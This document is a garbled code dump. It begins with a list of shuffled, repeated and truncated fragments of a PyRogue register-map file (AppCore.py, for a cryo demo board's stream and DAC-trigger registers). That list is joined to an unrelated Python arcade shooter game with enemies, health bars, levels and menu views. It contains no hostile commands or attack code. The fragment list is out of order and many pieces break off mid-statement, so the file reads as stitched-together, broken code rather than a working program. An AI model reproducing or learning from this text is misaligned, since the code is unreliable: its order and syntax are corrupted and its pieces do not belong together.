"the terms # contained in the LICENSE.txt file. #----------------------------------------------------------------------------- import pyrogue as pr",
"2017-04-03 #----------------------------------------------------------------------------- # Description: # PyRogue AMC Carrier Cryo Demo Board Application #-----------------------------------------------------------------------------",
"\"MicrowaveMuxCore[%i]\" % (i), # offset = (i*0x00100000), # expand = True, # ))",
"according to the terms # contained in the LICENSE.txt file. #----------------------------------------------------------------------------- import pyrogue",
"pr.UInt, mode = \"RW\", )) self.add(pr.RemoteVariable( name = \"StreamCounter\", description = \"Count number",
"(i), # offset = (i*0x00100000), # expand = True, # )) # #",
"base = pr.UInt, mode = \"RW\", )) self.add(pr.RemoteVariable( name = \"StreamCounter\", description =",
"bitOffset = 0, base = pr.UInt, mode = \"RW\", units = \"1/(307MHz)\", ))",
"0x00000010, bitSize = 32, bitOffset = 0, base = pr.UInt, mode = \"RO\",",
"########### # Registers ########### self.add(pr.RemoteVariable( name = \"DacSigTrigDelay\", description = \"DacSig TrigDelay\", offset",
"terms # contained in the LICENSE.txt file. #----------------------------------------------------------------------------- import pyrogue as pr from",
"AMC Carrier Cryo Demo Board Application #----------------------------------------------------------------------------- # File : AppCore.py # Created",
"or (numTxLanes[i] > 0)): # self.add(AmcMicrowaveMuxCore( # name = \"MicrowaveMuxCore[%i]\" % (i), #",
"self.add(pr.RemoteVariable( name = \"StreamCounterRst\", description = \"Reset stream counters\", offset = 0x00000008, bitSize",
"= 1, bitOffset = 8, base = pr.UInt, mode = \"RW\", )) self.add(pr.RemoteVariable(",
"= \"Stream EOFE counter\", offset = 0x00000010, bitSize = 32, bitOffset = 0,",
"description = \"DacSig TrigArm\", offset = 0x03000004, bitSize = 1, bitOffset = 0,",
"\"AppCore\", description = \"MicrowaveMux Application\", numRxLanes = [0,0], numTxLanes = [0,0], **kwargs): super().__init__(name=name,",
"offset = 0x00000008, bitSize = 1, bitOffset = 8, base = pr.UInt, mode",
"# name = \"MicrowaveMuxCore[%i]\" % (i), # offset = (i*0x00100000), # expand =",
"super().__init__(name=name, description=description, **kwargs) ######### # Devices self.add(pr.RemoteVariable( name = \"EnableStreams\", description = \"EnableStream\",",
"software platform. It is subject to # the license terms in the LICENSE.txt",
"distribution and at: # https://confluence.slac.stanford.edu/display/ppareg/LICENSE.html. # No part of the rogue software platform,",
"# Description: # PyRogue AMC Carrier Cryo Demo Board Application #----------------------------------------------------------------------------- # This",
"numRxLanes = [0,0], numTxLanes = [0,0], **kwargs): super().__init__(name=name, description=description, **kwargs) ######### # Devices",
"= 0x00000010, bitSize = 32, bitOffset = 0, base = pr.UInt, mode =",
"name = \"EofeCounterRst\", description = \"Reset stream EOFE\", offset = 0x00000008, bitSize =",
"\"RO\", pollInterval = 1, )) self.add(pr.RemoteVariable( name = \"EofeCounter\", description = \"Stream EOFE",
"propagated, or distributed except according to the terms # contained in the LICENSE.txt",
"offset=0x04000000, expand=False, )) ############################## # Commands ############################## @self.command(description=\"Arms for a DAC SIG Trigger",
"# Devices ######### # for i in range(2): # if ((numRxLanes[i] > 0)",
"rogue software platform. It is subject to # the license terms in the",
"\"RW\", )) self.add(pr.RemoteVariable( name = \"StreamCounterRst\", description = \"Reset stream counters\", offset =",
"[0,0], numTxLanes = [0,0], **kwargs): super().__init__(name=name, description=description, **kwargs) ######### # Devices ######### #",
"self.add(AmcMicrowaveMuxCore( # name = \"MicrowaveMuxCore[%i]\" % (i), # offset = (i*0x00100000), # expand",
"AppCore(pr.Device): def __init__( self, name = \"AppCore\", description = \"MicrowaveMux Application\", numRxLanes =",
"mode = \"RW\", units = \"1/(307MHz)\", )) self.add(pr.RemoteVariable( name = \"DacSigTrigArm\", description =",
"part of the rogue software platform, including this file, may be # copied,",
"the top-level directory # of this distribution and at: # https://confluence.slac.stanford.edu/display/ppareg/LICENSE.html. # No",
"= \"StreamReg\", description = \"Stream control\", **kwargs): super().__init__(name=name, description=description, **kwargs) ######### # Devices",
"#----------------------------------------------------------------------------- # Description: # PyRogue AMC Carrier Cryo Demo Board Application #----------------------------------------------------------------------------- #",
"offset = 0x03000004, bitSize = 1, bitOffset = 0, base = pr.UInt, mode",
"= pr.UInt, mode = \"RW\", )) self.add(pr.RemoteVariable( name = \"StreamCounterRst\", description = \"Reset",
"0x00000008, bitSize = 1, bitOffset = 8, base = pr.UInt, mode = \"RW\",",
"name = \"StreamControl\", description = \"Stream control\", **kwargs): super().__init__(name=name, description=description, **kwargs) ######### #",
"stream triggers\", offset = 0x0000000C, bitSize = 32, bitOffset = 0, base =",
"\"RW\", )) class StreamControl(pr.Device): def __init__( self, name = \"StreamControl\", description = \"Stream",
"= \"RO\", pollInterval = 1, )) self.add(pr.RemoteVariable( name = \"EofeCounter\", description = \"Stream",
"of stream triggers\", offset = 0x0000000C, bitSize = 32, bitOffset = 0, base",
"class StreamControl(pr.Device): def __init__( self, name = \"StreamControl\", description = \"Stream control\", **kwargs):",
"\"DacSigTrigArm\", description = \"DacSig TrigArm\", offset = 0x03000004, bitSize = 1, bitOffset =",
"= [0,0], **kwargs): super().__init__(name=name, description=description, **kwargs) ######### # Devices ######### # for i",
"= pr.UInt, mode = \"RO\", pollInterval = 1, )) class AppCore(pr.Device): def __init__(",
")) self.add(pr.RemoteVariable( name = \"DacSigTrigArm\", description = \"DacSig TrigArm\", offset = 0x03000004, bitSize",
"pr.UInt, mode = \"WO\", hidden = True, )) self.add(StreamControl( offset=0x03000000, )) self.add(StreamData( offset=0x04000000,",
")) self.add(StreamControl( offset=0x03000000, )) self.add(StreamData( offset=0x04000000, expand=False, )) ############################## # Commands ############################## @self.command(description=\"Arms",
")) self.add(pr.RemoteVariable( name = \"EofeCounter\", description = \"Stream EOFE counter\", offset = 0x00000010,",
"Devices for i in range(4096): self.add(pr.RemoteVariable( name = f'StreamData[{i}]', description = \"Dummy stream",
"if ((numRxLanes[i] > 0) or (numTxLanes[i] > 0)): # self.add(AmcMicrowaveMuxCore( # name =",
"mode = \"RW\", )) class StreamControl(pr.Device): def __init__( self, name = \"StreamControl\", description",
"or distributed except according to the terms # contained in the LICENSE.txt file.",
"expand=False)) ########### # Registers ########### self.add(pr.RemoteVariable( name = \"DacSigTrigDelay\", description = \"DacSig TrigDelay\",",
"python #----------------------------------------------------------------------------- # Title : PyRogue AMC Carrier Cryo Demo Board Application #-----------------------------------------------------------------------------",
"\"Stream control\", **kwargs): super().__init__(name=name, description=description, **kwargs) ######### # Devices self.add(pr.RemoteVariable( name = \"EnableStreams\",",
"= 0, base = pr.UInt, mode = \"RW\", )) self.add(pr.RemoteVariable( name = \"StreamCounterRst\",",
"\"Count number of stream triggers\", offset = 0x0000000C, bitSize = 32, bitOffset =",
"def __init__( self, name = \"AppCore\", description = \"MicrowaveMux Application\", numRxLanes = [0,0],",
"Board Application #----------------------------------------------------------------------------- # File : AppCore.py # Created : 2017-04-03 #----------------------------------------------------------------------------- #",
"file, may be # copied, modified, propagated, or distributed except according to the",
"super().__init__(name=name, description=description, **kwargs) ######### # Devices for i in range(4096): self.add(pr.RemoteVariable( name =",
"description = \"MicrowaveMux Application\", numRxLanes = [0,0], numTxLanes = [0,0], **kwargs): super().__init__(name=name, description=description,",
"bitSize = 32, bitOffset = 0, base = pr.UInt, mode = \"RO\", pollInterval",
"common.SimRtmCryoDet import * class StreamData(pr.Device): def __init__( self, name = \"StreamReg\", description =",
"pollInterval = 1, )) class AppCore(pr.Device): def __init__( self, name = \"AppCore\", description",
"Description: # PyRogue AMC Carrier Cryo Demo Board Application #----------------------------------------------------------------------------- # This file",
"subject to # the license terms in the LICENSE.txt file found in the",
"= \"EofeCounter\", description = \"Stream EOFE counter\", offset = 0x00000010, bitSize = 32,",
"0)): # self.add(AmcMicrowaveMuxCore( # name = \"MicrowaveMuxCore[%i]\" % (i), # offset = (i*0x00100000),",
"__init__( self, name = \"StreamControl\", description = \"Stream control\", **kwargs): super().__init__(name=name, description=description, **kwargs)",
"counter\", offset = 0x00000010, bitSize = 32, bitOffset = 0, base = pr.UInt,",
"description=description, **kwargs) ######### # Devices ######### # for i in range(2): # if",
"= \"RW\", )) self.add(pr.RemoteVariable( name = \"StreamCounterRst\", description = \"Reset stream counters\", offset",
"############################## # Commands ############################## @self.command(description=\"Arms for a DAC SIG Trigger to the DAQ",
"base = pr.UInt, mode = \"RO\", pollInterval = 1, )) self.add(pr.RemoteVariable( name =",
"bitSize = 1, bitOffset = 9, base = pr.UInt, mode = \"RW\", ))",
"# )) # # self.add(SysgenCryo(offset=0x01000000, expand=True)) self.add(SimRtmCryoDet( offset=0x02000000, expand=False)) ########### # Registers ###########",
"= \"Dummy stream data\", offset = 0x000000 + i*0x2, bitSize = 16, bitOffset",
"# if ((numRxLanes[i] > 0) or (numTxLanes[i] > 0)): # self.add(AmcMicrowaveMuxCore( # name",
"expand=False, )) ############################## # Commands ############################## @self.command(description=\"Arms for a DAC SIG Trigger to",
"file is part of the rogue software platform. It is subject to #",
"@self.command(description=\"Arms for a DAC SIG Trigger to the DAQ MUX\",) def CmdDacSigTrigArm(): self.DacSigTrigArm.set(1)",
"bitOffset = 9, base = pr.UInt, mode = \"RW\", )) self.add(pr.RemoteVariable( name =",
"as pr from common.SimRtmCryoDet import * class StreamData(pr.Device): def __init__( self, name =",
"= 0, base = pr.UInt, mode = \"RW\", units = \"1/(307MHz)\", )) self.add(pr.RemoteVariable(",
"\"StreamControl\", description = \"Stream control\", **kwargs): super().__init__(name=name, description=description, **kwargs) ######### # Devices self.add(pr.RemoteVariable(",
"offset=0x02000000, expand=False)) ########### # Registers ########### self.add(pr.RemoteVariable( name = \"DacSigTrigDelay\", description = \"DacSig",
"\"1/(307MHz)\", )) self.add(pr.RemoteVariable( name = \"DacSigTrigArm\", description = \"DacSig TrigArm\", offset = 0x03000004,",
"# Commands ############################## @self.command(description=\"Arms for a DAC SIG Trigger to the DAQ MUX\",)",
"# the license terms in the LICENSE.txt file found in the top-level directory",
"pr.UInt, mode = \"RO\", pollInterval = 1, )) self.add(pr.RemoteVariable( name = \"EofeCounter\", description",
"offset = (i*0x00100000), # expand = True, # )) # # self.add(SysgenCryo(offset=0x01000000, expand=True))",
"mode = \"RW\", )) self.add(pr.RemoteVariable( name = \"StreamCounterRst\", description = \"Reset stream counters\",",
"self.add(pr.RemoteVariable( name = \"StreamCounter\", description = \"Count number of stream triggers\", offset =",
"= \"RO\", pollInterval = 1, )) class AppCore(pr.Device): def __init__( self, name =",
"https://confluence.slac.stanford.edu/display/ppareg/LICENSE.html. # No part of the rogue software platform, including this file, may",
"the rogue software platform, including this file, may be # copied, modified, propagated,",
"data\", offset = 0x000000 + i*0x2, bitSize = 16, bitOffset = 0, base",
"= 0x0000000C, bitSize = 32, bitOffset = 0, base = pr.UInt, mode =",
"terms in the LICENSE.txt file found in the top-level directory # of this",
"except according to the terms # contained in the LICENSE.txt file. #----------------------------------------------------------------------------- import",
"Demo Board Application #----------------------------------------------------------------------------- # This file is part of the rogue software",
"**kwargs): super().__init__(name=name, description=description, **kwargs) ######### # Devices self.add(pr.RemoteVariable( name = \"EnableStreams\", description =",
"**kwargs) ######### # Devices self.add(pr.RemoteVariable( name = \"EnableStreams\", description = \"EnableStream\", offset =",
"\"RO\", pollInterval = 1, )) class AppCore(pr.Device): def __init__( self, name = \"AppCore\",",
"Board Application #----------------------------------------------------------------------------- # This file is part of the rogue software platform.",
"modified, propagated, or distributed except according to the terms # contained in the",
"= (i*0x00100000), # expand = True, # )) # # self.add(SysgenCryo(offset=0x01000000, expand=True)) self.add(SimRtmCryoDet(",
"bitOffset = 0, base = pr.UInt, mode = \"WO\", hidden = True, ))",
"No part of the rogue software platform, including this file, may be #",
"= 1, bitOffset = 9, base = pr.UInt, mode = \"RW\", )) self.add(pr.RemoteVariable(",
")) self.add(pr.RemoteVariable( name = \"EofeCounterRst\", description = \"Reset stream EOFE\", offset = 0x00000008,",
"8, base = pr.UInt, mode = \"RW\", )) self.add(pr.RemoteVariable( name = \"EofeCounterRst\", description",
"1, bitOffset = 0, base = pr.UInt, mode = \"RW\", )) self.add(pr.RemoteVariable( name",
"offset = 0x0000000C, bitSize = 32, bitOffset = 0, base = pr.UInt, mode",
"= pr.UInt, mode = \"RW\", )) self.add(pr.RemoteVariable( name = \"EofeCounterRst\", description = \"Reset",
")) self.add(pr.RemoteVariable( name = \"StreamCounter\", description = \"Count number of stream triggers\", offset",
"pr.UInt, mode = \"RW\", units = \"1/(307MHz)\", )) self.add(pr.RemoteVariable( name = \"DacSigTrigArm\", description",
"# Title : PyRogue AMC Carrier Cryo Demo Board Application #----------------------------------------------------------------------------- # File",
"bitSize = 16, bitOffset = 0, base = pr.Int, mode = \"RW\", ))",
"base = pr.UInt, mode = \"RW\", )) self.add(pr.RemoteVariable( name = \"EofeCounterRst\", description =",
"be # copied, modified, propagated, or distributed except according to the terms #",
"description=description, **kwargs) ######### # Devices for i in range(4096): self.add(pr.RemoteVariable( name = f'StreamData[{i}]',",
"############################## @self.command(description=\"Arms for a DAC SIG Trigger to the DAQ MUX\",) def CmdDacSigTrigArm():",
"0x03000000, bitSize = 24, bitOffset = 0, base = pr.UInt, mode = \"RW\",",
"name = f'StreamData[{i}]', description = \"Dummy stream data\", offset = 0x000000 + i*0x2,",
"description = \"Count number of stream triggers\", offset = 0x0000000C, bitSize = 32,",
"1, )) self.add(pr.RemoteVariable( name = \"EofeCounter\", description = \"Stream EOFE counter\", offset =",
"pr.UInt, mode = \"RW\", )) self.add(pr.RemoteVariable( name = \"EofeCounterRst\", description = \"Reset stream",
"\"StreamReg\", description = \"Stream control\", **kwargs): super().__init__(name=name, description=description, **kwargs) ######### # Devices for",
"Application #----------------------------------------------------------------------------- # File : AppCore.py # Created : 2017-04-03 #----------------------------------------------------------------------------- # Description:",
"\"Reset stream counters\", offset = 0x00000008, bitSize = 1, bitOffset = 8, base",
"import pyrogue as pr from common.SimRtmCryoDet import * class StreamData(pr.Device): def __init__( self,",
"name = \"DacSigTrigDelay\", description = \"DacSig TrigDelay\", offset = 0x03000000, bitSize = 24,",
"class StreamData(pr.Device): def __init__( self, name = \"StreamReg\", description = \"Stream control\", **kwargs):",
"in the LICENSE.txt file. #----------------------------------------------------------------------------- import pyrogue as pr from common.SimRtmCryoDet import *",
"mode = \"RO\", pollInterval = 1, )) class AppCore(pr.Device): def __init__( self, name",
"platform, including this file, may be # copied, modified, propagated, or distributed except",
"= \"Reset stream counters\", offset = 0x00000008, bitSize = 1, bitOffset = 8,",
"__init__( self, name = \"StreamReg\", description = \"Stream control\", **kwargs): super().__init__(name=name, description=description, **kwargs)",
"offset = 0x000000 + i*0x2, bitSize = 16, bitOffset = 0, base =",
"file found in the top-level directory # of this distribution and at: #",
"0, base = pr.UInt, mode = \"RO\", pollInterval = 1, )) class AppCore(pr.Device):",
"base = pr.UInt, mode = \"RW\", units = \"1/(307MHz)\", )) self.add(pr.RemoteVariable( name =",
"LICENSE.txt file. #----------------------------------------------------------------------------- import pyrogue as pr from common.SimRtmCryoDet import * class StreamData(pr.Device):",
"pyrogue as pr from common.SimRtmCryoDet import * class StreamData(pr.Device): def __init__( self, name",
"EOFE\", offset = 0x00000008, bitSize = 1, bitOffset = 9, base = pr.UInt,"
] |
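# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the original AppCore.py): the StreamData
# device above maps 4096 signed 16-bit samples, one every 2 bytes, on top of
# the 0x04000000 base that AppCore assigns it. The helper below is a
# hypothetical stand-alone reproduction of that address arithmetic, useful
# for sanity-checking the register map offline; the function name and default
# offset are assumptions, not part of the rogue API.
def stream_data_address(index, device_offset=0x04000000):
    """Return the absolute byte address of StreamData[index]."""
    if not 0 <= index < 4096:
        raise IndexError("StreamData index out of range")
    return device_offset + index*0x2

assert stream_data_address(0)    == 0x04000000
assert stream_data_address(1)    == 0x04000002
assert stream_data_address(4095) == 0x04001FFE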
import arcade
import random
import math
import os
from arcade.color import BLACK, WHITE

SPRITE_SCALING_PLAYER = .60
SPRITE_SCALING_ENEMY = 0.5
SPRITE_SCALING_ENEMY_2 = 0.15
SPRITE_SCALING_ENEMY_3 = 0.3
SPRITE_SCALING_BULLET = 0.7
ENEMY_COUNT = 15
SCREEN_WIDTH = 800
SCREEN_HEIGHT = 600
SCREEN_TITLE = "Shooter Game"
SPRITE_SPEED = 0.20
BULLET_SPEED = 5
HEALTHBAR_WIDTH = 25
HEALTHBAR_HEIGHT = 5
HEALTHBAR_OFFSET_Y = -10
HEALTH_NUMBER_OFFSET_X = -10
HEALTH_NUMBER_OFFSET_Y = 5
MOVEMENT_SPEED = 5  # assumed value; the player speed constant was lost from the source


class PLAYER(arcade.Sprite):
    def __init__(self, image, scale, player_max_health):
        super().__init__(image, scale)
        # Add extra attributes for health
        self.player_max_health = player_max_health
        self.player_cur_health = player_max_health

    def player_draw_health_number(self):
        # Draw how many health the player has
        health_string = f"{self.player_cur_health}/{self.player_max_health}"
        start_x = 120  # assumed anchor; only start_y survives in the source
        start_y = 40
        arcade.draw_text(health_string, start_x + HEALTH_NUMBER_OFFSET_X,
                         start_y + HEALTH_NUMBER_OFFSET_Y, arcade.color.WHITE, 12)
        # arcade.draw_text(health_string,
        #                  start_x=self.center_x + HEALTH_NUMBER_OFFSET_X,
        #                  start_y=self.center_y + HEALTH_NUMBER_OFFSET_Y,
        #                  font_size=12,
        #                  color=arcade.color.WHITE)

    def player_draw_health_bar(self):
        # Draw the health bar
        # Draw the red background
        start_x = 120
        start_y = 35
        if self.player_cur_health < self.player_max_health:
            arcade.draw_rectangle_filled(start_x + HEALTH_NUMBER_OFFSET_X,
                                         start_y + HEALTHBAR_OFFSET_Y,
                                         width=HEALTHBAR_WIDTH + 50,  # assumed padding; exact value lost
                                         height=HEALTHBAR_HEIGHT + 10,
                                         color=arcade.color.RED)
        # Calculate width based on health
        start_x = 85
        start_y = 25
        health_width = (HEALTHBAR_WIDTH + 50) * (self.player_cur_health / self.player_max_health)
        arcade.draw_rectangle_filled(start_x - 0.5 * (HEALTHBAR_WIDTH - health_width),
                                     start_y,
                                     width=health_width,
                                     height=HEALTHBAR_HEIGHT,
                                     color=arcade.color.GREEN)

    def update(self):
        """ Move the player """
        # Move player around the screen
        self.center_x += self.change_x
        self.center_y += self.change_y
        # Check for out-of-bounds
        if self.left < 0:
            self.left = 0
        elif self.right > SCREEN_WIDTH - 1:
            self.right = SCREEN_WIDTH - 1
        # Make sure he can't go off the screen
        if self.bottom < 0:
            self.bottom = 0
        elif self.top > SCREEN_HEIGHT - 1:
            self.top = SCREEN_HEIGHT - 1


class ENEMY(arcade.Sprite):
    def update(self):
        # Rotate the coin.
        # The arcade.Sprite class has an "angle" attribute that controls the
        # sprite rotation. Change this, and the sprite rotates.
        self.angle += self.change_angle

    def follow_sprite(self, player_sprite):
        # This tells the enemies to go to the main player
        if self.center_y < player_sprite.center_y:
            self.center_y += min(SPRITE_SPEED, player_sprite.center_y - self.center_y)
        elif self.center_y > player_sprite.center_y:
            self.center_y -= min(SPRITE_SPEED, self.center_y - player_sprite.center_y)
        if self.center_x < player_sprite.center_x:
            self.center_x += min(SPRITE_SPEED, player_sprite.center_x - self.center_x)
        elif self.center_x > player_sprite.center_x:
            self.center_x -= min(SPRITE_SPEED, self.center_x - player_sprite.center_x)

    def __init__(self, image, scale, enemy_max_health):
        super().__init__(image, scale)
        # Add extra attributes for health
        self.enemy_max_health = enemy_max_health
        self.enemy_cur_health = enemy_max_health

    def enemy_draw_health_number(self):
        # Draw how many health the enemies have
        health_string = f"{self.enemy_cur_health}/{self.enemy_max_health}"
        arcade.draw_text(health_string,
                         start_x=self.center_x + HEALTH_NUMBER_OFFSET_X,
                         start_y=self.center_y + HEALTH_NUMBER_OFFSET_Y,
                         font_size=12,
                         color=arcade.color.WHITE)

    def enemy_draw_health_bar(self):
        # Draw the health bar
        if self.enemy_cur_health < self.enemy_max_health:
            arcade.draw_rectangle_filled(center_x=self.center_x,
                                         center_y=self.center_y + HEALTHBAR_OFFSET_Y,
                                         width=HEALTHBAR_WIDTH,
                                         height=3,
                                         color=arcade.color.RED)
        # Calculate width based on health
        health_width = HEALTHBAR_WIDTH * (self.enemy_cur_health / self.enemy_max_health)
        arcade.draw_rectangle_filled(center_x=self.center_x - 0.5 * (HEALTHBAR_WIDTH - health_width),
                                     center_y=self.center_y - 10,
                                     width=health_width,
                                     height=HEALTHBAR_HEIGHT,
                                     color=arcade.color.GREEN)
"1 self.updated_level = -1 self.amount_of_enemies = 5 self.speed = SPRITE_SPEED # Game Sounds",
"self.newLevel_sound = arcade.load_sound(\"shooting_game/assets/sounds/newLevel.wav\") self.gun_sound = arcade.load_sound(\"shooting_game/assets/sounds/shoot.wav\") self.hit_sound = arcade.load_sound(\"shooting_game/assets/sounds/shoot.wav\") self.death_sound = arcade.load_sound(\"shooting_game/assets/sounds/deathenemy.wav\") self.playerDeath_sound",
"enemy image enemy = ENEMY(\":resources:images/animated_characters/robot/robot_walk7.png\", SPRITE_SCALING_ENEMY, self.enemy_health) enemy2 = ENEMY(\":resources:images/animated_characters/robot/robot_fall.png\", SPRITE_SCALING_ENEMY_2, self.enemy_health2) #",
"35 if self.player_cur_health < self.player_max_health: arcade.draw_rectangle_filled(start_x + HEALTH_NUMBER_OFFSET_X, start_y + HEALTHBAR_OFFSET_Y, width=HEALTHBAR_WIDTH +",
"self.down_pressed: self.player_sprite.change_y = MOVEMENT_SPEED elif self.down_pressed and not self.up_pressed: self.player_sprite.change_y = -MOVEMENT_SPEED if",
"start_x = 220 start_y = 370 arcade.draw_text(\"Shooter Game\", start_x, start_y, arcade.color.WHITE, 50) self.player_sprite",
"super().__init__(image, scale) # Add extra attributes for health self.enemy_max_health = enemy_max_health self.enemy_cur_health =",
"or bullet.right < 0 or bullet.left > self.width: bullet.remove_from_sprite_lists() def main(): window =",
"\"Shooter Game\") menu_view = MenuView() window.show_view(menu_view) arcade.run() window.level = 0 # game =",
"= random.randrange(SCREEN_WIDTH) enemy2.center_y = random.randrange(120, SCREEN_HEIGHT) enemy3.center_x = random.randrange(SCREEN_WIDTH) enemy3.center_y = random.randrange(120, SCREEN_HEIGHT)",
"around the screen self.center_x += self.change_x self.center_y += self.change_y # Check for out-of-bounds",
"= 240 arcade.draw_text(\"Use your mouse to aim\", start_x, start_y, arcade.color.RED, 15) start_x =",
"self.left < 0: self.left = 0 elif self.right > SCREEN_WIDTH - 1: self.right",
"self.enemy_list.append(enemy2) self.enemy_list.append(enemy3) if self.enemy_list == 0: self.window.level = self.updated_level + 1 else: self.good",
"player_sprite.center_y - self.center_y) elif self.center_y > player_sprite.center_y: self.center_y -= min(SPRITE_SPEED, self.center_y - player_sprite.center_y)",
"start_x, start_y, arcade.color.RED, 15) start_x = 330 start_y = 110 arcade.draw_text(\"Click to start\",",
"to return to Main Menu.\\n\", SCREEN_WIDTH/2, SCREEN_HEIGHT/4, arcade.color.WHITE, 25, anchor_x=\"center\") def on_key_press(self, key,",
"= False elif key == arcade.key.LEFT: self.left_pressed = False elif key == arcade.key.RIGHT:",
"min(SPRITE_SPEED, self.center_y - player_sprite.center_y) if self.center_x < player_sprite.center_x: self.center_x += min(SPRITE_SPEED, player_sprite.center_x -",
"to calculate how to get the bullet to the destination. x_diff = dest_x",
"-MOVEMENT_SPEED elif self.right_pressed and not self.left_pressed: self.player_sprite.change_x = MOVEMENT_SPEED self.player_list.update() for enemy in",
"health if enemy.enemy_cur_health <= 0: # enemy dead enemy.remove_from_sprite_lists() arcade.play_sound(self.death_sound) else: # Not",
"change_y. Velocity is how fast the bullet travels. bullet.change_x = math.cos(angle) * BULLET_SPEED",
"SPRITE_SCALING_ENEMY_2 = 0.15 SPRITE_SCALING_ENEMY_3 = 0.3 SPRITE_SCALING_BULLET = 0.7 ENEMY_COUNT = 15 SCREEN_WIDTH",
"# Add the enemy to the lists self.enemy_list.append(enemy) self.enemy_list.append(enemy2) self.enemy_list.append(enemy3) if self.enemy_list ==",
"ENEMY(\":resources:images/animated_characters/robot/robot_fall.png\", SPRITE_SCALING_ENEMY_2, self.enemy_health2) enemy3 = ENEMY(\":resources:images/enemies/saw.png\", SPRITE_SCALING_ENEMY_3, self.enemy_health3) # Position the enemy enemy.center_x",
"died in level: {self.window.level}\", start_x, start_y, arcade.color.RED, 20) arcade.draw_text(\"Click ESCAPE to return to",
"+ HEALTH_NUMBER_OFFSET_X, start_y=self.center_y + HEALTH_NUMBER_OFFSET_Y, font_size=12, color=arcade.color.WHITE) def enemy_draw_health_bar(self): # Draw the health",
"< 6: for i in range(self.amount_of_enemies): # Create the enemy image enemy =",
"the game # Sprite lists self.window.level = 1 self.player_list = arcade.SpriteList() self.enemy_list =",
"to the lists self.enemy_list.append(enemy) self.enemy_list.append(enemy2) self.enemy_list.append(enemy3) if self.enemy_list == 0: self.window.level = self.updated_level",
"player_sprite.center_y: self.center_y += min(SPRITE_SPEED, player_sprite.center_y - self.center_y) elif self.center_y > player_sprite.center_y: self.center_y -=",
"15) start_x = 310 start_y = 240 arcade.draw_text(\"Use your mouse to aim\", start_x,",
"= f\"Level: {self.window.level}\" arcade.draw_text(output, 12, 45, arcade.color.WHITE, 15) for player in self.player_list: player.player_draw_health_number()",
"rid of the bullet if len(hit_list) > 0: bullet.remove_from_sprite_lists() # For every enemy",
"1 self.player_list = arcade.SpriteList() self.enemy_list = arcade.SpriteList() self.bullet_list = arcade.SpriteList() self.player_sprite = PLAYER(\":resources:images/animated_characters/male_adventurer/maleAdventurer_walk1.png\",",
"rotates. self.angle += self.change_angle def follow_sprite(self, player_sprite): # This tells the enemies to",
"start_x = 330 start_y = 110 arcade.draw_text(\"Click to start\", start_x, start_y, arcade.color.WHITE, 20)",
"270 arcade.draw_text(\"Use the arrow keys on your keyboard to move around\", start_x, start_y,",
"mouse to aim\", start_x, start_y, arcade.color.RED, 15) start_x = 360 start_y = 210",
"def update(self): \"\"\" Move the player \"\"\" # Move player around the screen",
"whenever a key is pressed. \"\"\" if key == arcade.key.UP: self.up_pressed = True",
"If it did, get rid of the bullet if len(hit_list) > 0: bullet.remove_from_sprite_lists()",
"True self.levels() self.amount_of_enemies += 2 #self.enemy_health += 1 self.speed += .20 arcade.play_sound(self.newLevel_sound) for",
"on_draw(self): \"\"\" Draw the menu \"\"\" arcade.start_render() start_x = 220 start_y = 370",
"= None self.enemy_list = None self.bullet_list = None # Set up the player",
"bullet for bullet in self.bullet_list: # Check this bullet to see if it",
"= arcade.load_sound(\"shooting_game/assets/sounds/newLevel.wav\") self.gun_sound = arcade.load_sound(\"shooting_game/assets/sounds/shoot.wav\") self.hit_sound = arcade.load_sound(\"shooting_game/assets/sounds/shoot.wav\") self.death_sound = arcade.load_sound(\"shooting_game/assets/sounds/deathenemy.wav\") self.playerDeath_sound =",
"player \"\"\" # Move player around the screen self.center_x += self.change_x self.center_y +=",
"self.up_pressed and not self.down_pressed: self.player_sprite.change_y = MOVEMENT_SPEED elif self.down_pressed and not self.up_pressed: self.player_sprite.change_y",
"arcade.key.RIGHT: self.right_pressed = False def on_draw(self): # render the screen befroe start drawing",
"= SCREEN_HEIGHT - 1 class ENEMY(arcade.Sprite): def update(self): # Rotate the coin. #",
"arcade.load_sound(\"shooting_game/assets/sounds/gameOver.wav\") self.left_pressed = False self.right_pressed = False self.up_pressed = False self.down_pressed = False",
"\"\"\" game_view = MyGame() game_view.setup() self.window.show_view(game_view) arcade.run() class GameOverView(arcade.View): \"\"\" Class to manage",
"arcade.start_render() arcade.draw_text(\"Game Over!\\n\", SCREEN_WIDTH/2, SCREEN_HEIGHT/2.5, arcade.color.RED, 100, anchor_x=\"center\") start_x = 290 start_y =",
"health self.enemy_max_health = enemy_max_health self.enemy_cur_health = enemy_max_health def enemy_draw_health_number(self): # Draw how many",
"arcade.play_sound(self.newLevel_sound) else: self.good = False elif self.window.level > 3 and self.window.level < 6:",
"self.background) # Draw all the sprites self.enemy_list.draw() self.bullet_list.draw() self.player_list.draw() output = f\"Level: {self.window.level}\"",
"start_y = 110 arcade.draw_text(\"Click to start\", start_x, start_y, arcade.color.WHITE, 20) arcade.draw_rectangle_outline(center_x=395, center_y=123, width=200,",
"class initializer #super().__init__(SCREEN_WIDTH, SCREEN_HEIGHT, SCREEN_TITLE) super().__init__() # Variables that will hold sprite lists",
"or bullet.top < 0 or bullet.right < 0 or bullet.left > self.width: bullet.remove_from_sprite_lists()",
"arcade.draw_text(f\"You died in level: {self.window.level}\", start_x, start_y, arcade.color.RED, 20) arcade.draw_text(\"Click ESCAPE to return",
"self.up_pressed: self.player_sprite.change_y = -MOVEMENT_SPEED if self.left_pressed and not self.right_pressed: self.player_sprite.change_x = -MOVEMENT_SPEED elif",
"Calculate width based on health start_x = 85 start_y = 25 health_width =",
"False elif key == arcade.key.DOWN: self.down_pressed = False elif key == arcade.key.LEFT: self.left_pressed",
"= ENEMY(\":resources:images/enemies/saw.png\", SPRITE_SCALING_ENEMY_3, self.enemy_health3) # Position the enemy enemy.center_x = random.randrange(SCREEN_WIDTH) enemy.center_y =",
"ints\") # Remove one health point enemy.enemy_cur_health -= 1 # Check health if",
"SPRITE_SCALING_ENEMY, self.enemy_health) # Position the enemy enemy.center_x = random.randrange(SCREEN_WIDTH) enemy.center_y = random.randrange(120, SCREEN_HEIGHT)",
"270 arcade.draw_text(f\"You died in level: {self.window.level}\", start_x, start_y, arcade.color.RED, 20) arcade.draw_text(\"Click ESCAPE to",
"get rid of the bullet if len(hit_list) > 0: bullet.remove_from_sprite_lists() # For every",
"start_x = 85 start_y = 25 health_width = (HEALTHBAR_WIDTH +50) * (self.player_cur_health /",
